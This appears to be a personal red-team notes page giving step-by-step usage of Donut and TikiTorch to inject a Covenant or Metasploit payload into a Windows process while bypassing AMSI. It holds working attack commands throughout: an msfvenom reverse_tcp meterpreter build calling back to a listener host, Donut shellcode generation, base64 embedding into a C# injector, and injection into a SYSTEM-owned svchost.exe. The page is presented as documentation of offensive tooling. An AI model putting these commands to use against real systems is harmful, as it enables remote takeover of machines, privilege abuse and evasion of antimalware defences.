Donut Tiki Convenant

Inject Convenant Launcher into a Process

Inject convenant or metasploit payload into a process. This also bypasses AMSI, tested on Windows 10 1909 as of May 2020. Credits to RastaMouse and TheWover. Just documenting usage for note keeping purposes.

1. Generate Convenant payload, or msf x64 payload

Launchers > Binary > Generate > Download
payload1
payload2

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.10.10 lport=443 -f exe -o 443.exe

2. use Donut to generate payload

donut will generate payload which can be injected to process

cd /opt; git clone https://github.com/TheWover/donut.git
cd donut
make

# then cd to payload folder, -a 2 = x64
/opt/donut/donut -f ./8080.exe -o ./payload.bin
# donut 0.93 syntax:
/opt/donut/donut ./8080.exe -o ./payload.bin

payload3

3. combine payload with TikiTorch to generate injector.exe

From this: https://gist.githubusercontent.com/rasta-mouse/3f73f1787e6ab1ceead636ca632a50bf/raw/362ce3736c6bd0a73b40e8a6831cc0446c10d584/gistfile1.txt

Create C# .Net Framework Project, choose .Net 4 proj1
proj2

Then copy the base64 encoded donut payload payload.bin

PS> [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes(".\payload.bin"))|clip


and paste it here on line 16:
proj3

Make sure payloads are correct format: x64 msf payload with donut -a 2, and inject into 64bit process.

Then find process to inject to, in this case pid 1784, svchost.exe owned by NT system.

PS> ps -inc | ? {$_.UserName -match "SYSTEM" -and  $_.processname -eq "svchost"} ;
PS> .\GruntInjection.exe "C:\Windows\System32\svchost.exe"  1784


source:
https://rastamouse.me/2019/08/covenant-donut-tikitorch/
https://github.com/TheWover/donut


back